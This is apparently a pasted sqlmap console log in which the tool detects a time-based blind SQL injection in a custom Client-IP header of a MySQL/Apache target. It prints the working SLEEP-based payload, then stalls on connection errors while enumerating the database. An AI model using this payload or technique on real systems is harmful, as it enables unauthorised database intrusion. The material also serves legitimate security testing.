[00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive
[00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'='
---
[00:43:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [00:43:36] [INFO] fetching current database
[00:43:36] [INFO] retrieved:
[00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prev nt potential disruptions
[00:46:21] [ERROR] invalid character detected. retrying..
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further
arget testing? [y/N]